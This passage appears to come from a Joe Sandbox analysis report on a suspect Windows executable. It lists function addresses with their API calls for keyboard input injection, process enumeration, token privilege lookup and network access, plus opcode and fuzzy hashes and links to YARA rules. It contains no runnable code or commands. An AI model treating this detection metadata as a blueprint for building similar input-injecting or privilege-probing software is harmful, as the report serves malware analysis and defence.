PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00B80BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00B80BFB

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: eae28ac61da1c49eeb5a616dce380c12f8438fa88bd15220248e8b7b0b862794
Instruction ID: a7930c4b77dfada0d22c257550e644074727a4ed2b035e504097e7feefa4183c
Opcode Fuzzy Hash: eae28ac61da1c49eeb5a616dce380c12f8438fa88bd15220248e8b7b0b862794
Instruction Fuzzy Hash: D5314830D50208AEFB70BB658C05BFABBE9EB45394F0442DAE490521F1C7748948D755

Function 00B80C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00B80C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B80C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B80CE1
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00B80D33

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: bc0f4677447d6a40233613393fc3ccbeefaa7da110c66338145b58d266e4523b
Instruction ID: 954dfae50ecce8f3a645b54935e20b41cec68db0f07ef3a4a2f80e3eb49efdce
Opcode Fuzzy Hash: bc0f4677447d6a40233613393fc3ccbeefaa7da110c66338145b58d266e4523b
Instruction Fuzzy Hash: 35314630910208AEFF70BFA9C8057FEBBE6EB45350F0483AAE884521F1C3359959DB51

Function 00B561C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B561FB
__isleadbyte_l.LIBCMT ref: 00B56229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B56257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B5628D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3e1ccef5222bc63e3afc534ee3cbea779baa768c3349c9e7059fb3e375b69aa2
Instruction ID: c7072d0564bc67c128a5532b98bb6bec88ba0917e638d8372f1e432a3f34203f
Opcode Fuzzy Hash: 3e1ccef5222bc63e3afc534ee3cbea779baa768c3349c9e7059fb3e375b69aa2
Instruction Fuzzy Hash: EA31EE30600246AFDF218F64CC44BBA7BE9FF42312F5541E8EC60971A1DB32D954DB90

Function 00BA4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00BA4F02

Part of subcall function 00B83641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8365B
Part of subcall function 00B83641: GetCurrentThreadId.KERNEL32 ref: 00B83662
Part of subcall function 00B83641: AttachThreadInput.USER32(00000000,?,00B85005), ref: 00B83669

GetCaretPos.USER32(?), ref: 00BA4F13
ClientToScreen.USER32(00000000,?), ref: 00BA4F4E
GetForegroundWindow.USER32 ref: 00BA4F54

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 2ae6b6ad61a93df5b0a165cce724f8df4d1a75f85ae15841e83f755bc80b668e
Instruction ID: 14a878fdc213b5512a3d786bb084c0c6bd6cd0b67ac7a9743a7e5c272c7e2aa9
Opcode Fuzzy Hash: 2ae6b6ad61a93df5b0a165cce724f8df4d1a75f85ae15841e83f755bc80b668e
Instruction Fuzzy Hash: 22313E71D00118AFCB00EFA5D8859EFB7F9EF99300F1044AAE419E7241EA719E05CBA0

Function 00B83C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B83C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00B83C88
Process32NextW.KERNEL32(00000000,?), ref: 00B83CA8
CloseHandle.KERNEL32(00000000), ref: 00B83D52

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 5c27e7d8cd030e3b24b44acc5fc5b764b3e65443b48604dcdf4d92de7fabeede
Instruction ID: 4d3fcf75e9ad7932f8cbf9ebf680948032a1dfd40cea2b3e92ac45aa28d06a0a
Opcode Fuzzy Hash: 5c27e7d8cd030e3b24b44acc5fc5b764b3e65443b48604dcdf4d92de7fabeede
Instruction Fuzzy Hash: D031D1711083069FC310EF50D881ABFBBE8EF96750F40086DF485861A1EF719E49CB92

Function 00BAC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

GetCursorPos.USER32(?), ref: 00BAC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B5B9AB,?,?,?,?,?), ref: 00BAC4E7
GetCursorPos.USER32(?), ref: 00BAC534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B5B9AB,?,?,?), ref: 00BAC56E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 38ae5ed032a69eb4bbc2dee261159e758ac6188cc0347fe01e37f4aab9b8af27
Instruction ID: 1373d431e571556c10411752305bd07c13768d9058650aab4f9be327a022caf1
Opcode Fuzzy Hash: 38ae5ed032a69eb4bbc2dee261159e758ac6188cc0347fe01e37f4aab9b8af27
Instruction Fuzzy Hash: C4316139900458EFCB258F98C899EFA7FF5EF1A310F4441A5F9058B261CB31AD50DBA4

Function 00B78656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B78121
Part of subcall function 00B7810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B7812B
Part of subcall function 00B7810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B7813A
Part of subcall function 00B7810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B78141
Part of subcall function 00B7810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B78157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B786A3
_memcmp.LIBCMT ref: 00B786C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B786FC
HeapFree.KERNEL32(00000000), ref: 00B78703

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 59a4f866ed08599898e2fca7c51e5dc9d751a73675dd5a65c20755db0d88d62d
Instruction ID: 6068dbf1bc988ca4d7a78e49f30f9276b080caf7c31af23b784d7c538737a4ac
Opcode Fuzzy Hash: 59a4f866ed08599898e2fca7c51e5dc9d751a73675dd5a65c20755db0d88d62d
Instruction Fuzzy Hash: 85214C71E80109EFDB10DFA4C949BEEB7F8EF45315F158099E458A7241DB31AE05DBA0

Function 00B4098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00B409AE

Part of subcall function 00B25A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B87896,?,?,00000000), ref: 00B25A2C
Part of subcall function 00B25A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B87896,?,?,00000000,?,?), ref: 00B25A50

_fprintf.LIBCMT ref: 00B409E5
OutputDebugStringW.KERNEL32(?), ref: 00B75DBB

Part of subcall function 00B44AAA: _flsall.LIBCMT ref: 00B44AC3

__setmode.LIBCMT ref: 00B40A1A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: bda57de4218bd042a04775fbe3ca6be3ab0d8703eabd8b887588679a2113730e
Instruction ID: 7c5fb7fce2c492503f73d707fea15b01844d2f01f4891bf63d2317c276c99ea5
Opcode Fuzzy Hash: bda57de4218bd042a04775fbe3ca6be3ab0d8703eabd8b887588679a2113730e
Instruction Fuzzy Hash: C21157319042047FDB14B6B8AC87AFE77E8DF42320F2400E5F20867192EF704E52A3A1

Function 00B91767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B917A3

Part of subcall function 00B9182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B9184C
Part of subcall function 00B9182D: InternetCloseHandle.WININET(00000000), ref: 00B918E9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: bbabe192ba19ab8e1ee3f8bf8a0d92e1fcc6b93f915fa95d27ee4b8baaab6118
Instruction ID: a2c0359cfa98b35551b1707f264b61bd84d8b49109bcccf2da9c30167ef9c67c
Opcode Fuzzy Hash: bbabe192ba19ab8e1ee3f8bf8a0d92e1fcc6b93f915fa95d27ee4b8baaab6118
Instruction Fuzzy Hash: 6021A771600606BFDF129FA4DC81FBABBE9FF49710F104879FA1196650DB719811B7A0

Function 00B83A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00BAFAC0), ref: 00B83A64
GetLastError.KERNEL32 ref: 00B83A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B83A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BAFAC0), ref: 00B83ADF

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 477c23e9a12d6364116e00d7d53f5d382d04b8da4132a8b9b4c4516da6a71319
Instruction ID: 753e0a60d4a75ed10369290ab7708172077cbebce0d75143ea05d1eabb0a5dec
Opcode Fuzzy Hash: 477c23e9a12d6364116e00d7d53f5d382d04b8da4132a8b9b4c4516da6a71319
Instruction Fuzzy Hash: 3721A3745082029F8714EF28D8818AE77E4EE56B64F104AADF499C72B1DB31DE46CB52

Function 00B7DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B7DCD3,?,?,?,00B7EAC6,00000000,000000EF,00000119,?,?), ref: 00B7F0CB
Part of subcall function 00B7F0BC: lstrcpyW.KERNEL32(00000000,?,?,00B7DCD3,?,?,?,00B7EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00B7F0F1
Part of subcall function 00B7F0BC: lstrcmpiW.KERNEL32(00000000,?,00B7DCD3,?,?,?,00B7EAC6,00000000,000000EF,00000119,?,?), ref: 00B7F122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B7EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00B7DCEC
lstrcpyW.KERNEL32(00000000,?,?,00B7EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00B7DD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00B7EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00B7DD46

Strings

cdecl, xrefs: 00B7DD3D

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 9f0983d46e79d41a27a05fb1b13177c20f9c0258510df942d96b7dcfd1593bfb
Instruction ID: 6b05437582d0a964e2184299bf5c595e28e19c11e71469eacb201c9a6b4a585c
Opcode Fuzzy Hash: 9f0983d46e79d41a27a05fb1b13177c20f9c0258510df942d96b7dcfd1593bfb
Instruction Fuzzy Hash: FA11B43A200305EBCB259F74CC4597A77F9FF45390B4081BAE91ACB260EB719950D795

Function 00B550E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00B55101

Part of subcall function 00B4571C: __FF_MSGBANNER.LIBCMT ref: 00B45733
Part of subcall function 00B4571C: __NMSG_WRITE.LIBCMT ref: 00B4573A
Part of subcall function 00B4571C: RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,00000000,?,?,?,00B40DD3,?), ref: 00B4575F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 4cb197b07a13adb17a125cf854abfffa4939221265dbf259fffaa80265897c77
Instruction ID: 4cb6f47546fbd7a6ee5265d98074ae8e7de4606702bdb03279364660b4f81b36
Opcode Fuzzy Hash: 4cb197b07a13adb17a125cf854abfffa4939221265dbf259fffaa80265897c77
Instruction Fuzzy Hash: 5A119172900E12AFCB312FB4AC9A76D3BD8DB053A3B1005E9FD45AB151DE318A45AA94

Function 00B244A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B244CF

Part of subcall function 00B2407C: _memset.LIBCMT ref: 00B240FC
Part of subcall function 00B2407C: _wcscpy.LIBCMT ref: 00B24150
Part of subcall function 00B2407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B24160

KillTimer.USER32(?,00000001,?,?), ref: 00B24524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B24533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B5D4B9

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: e0d838e980404b8dd0e564a6fc5e00d820f4fa178781d403e03af164c9b2568f
Instruction ID: f758bb70d6d27a4d29eaf0d4d83e69b88696691b54fb30acb4e3e0a84f8b5f17
Opcode Fuzzy Hash: e0d838e980404b8dd0e564a6fc5e00d820f4fa178781d403e03af164c9b2568f
Instruction Fuzzy Hash: 2D21D370904794AFE732CB249886BE6BBECDB15309F0400DDE6CE5B241C7746A888B41

Function 00B96369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B25A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B87896,?,?,00000000), ref: 00B25A2C
Part of subcall function 00B25A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B87896,?,?,00000000,?,?), ref: 00B25A50

gethostbyname.WSOCK32(?,?,?), ref: 00B96399
WSAGetLastError.WSOCK32(00000000), ref: 00B963A4
_memmove.LIBCMT ref: 00B963D1
inet_ntoa.WSOCK32(?), ref: 00B963DC

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 8965374d9db46110ac7363b6f39c415cba70472962a6796719592002cedeb82b
Instruction ID: d4c16c0fa9963cf67c981ab8c674f6804159aac6290541bda964eaee0a843f37
Opcode Fuzzy Hash: 8965374d9db46110ac7363b6f39c415cba70472962a6796719592002cedeb82b
Instruction Fuzzy Hash: CB112E72900119AFCF14FBA4ED86DEEB7F8AF16310B1440A5F509A7262DF30AE14DB61

Function 00B78B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00B78B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B78B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B78B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B78BA4

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 11ea7d546c5a6b95025398e21d22d36385376a9ec90bc9f11860b54c25f40853
Instruction ID: bbc668921522e9fc0404b25d155e57165fd99f3be2809d56bf29414b49095f6b
Opcode Fuzzy Hash: 11ea7d546c5a6b95025398e21d22d36385376a9ec90bc9f11860b54c25f40853
Instruction Fuzzy Hash: EA115E79940218FFDB10DF95CC85FADBBB4FB48310F204095E914B7290DA716E10DB94

Function 00B21290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

DefDlgProcW.USER32(?,00000020,?), ref: 00B212D8
GetClientRect.USER32(?,?), ref: 00B5B5FB
GetCursorPos.USER32(?), ref: 00B5B605
ScreenToClient.USER32(?,?), ref: 00B5B610

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: c6ff621e6bc0157cc4667e96c2ba9436bdb3f6dddc259b2c0ed6b1d75138ae83
Instruction ID: 3a224548c24aa3787aa5c5d5b77136cd1b19dbb0eb494360b312edb85d5055d0
Opcode Fuzzy Hash: c6ff621e6bc0157cc4667e96c2ba9436bdb3f6dddc259b2c0ed6b1d75138ae83
Instruction Fuzzy Hash: E811283590002AEFCB10DFA8E8869FE77F8EB16301F500995F945E7241DB30BA55CBA5

Function 00B81142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B7FCED,?,00B80D40,?,00008000), ref: 00B8115F
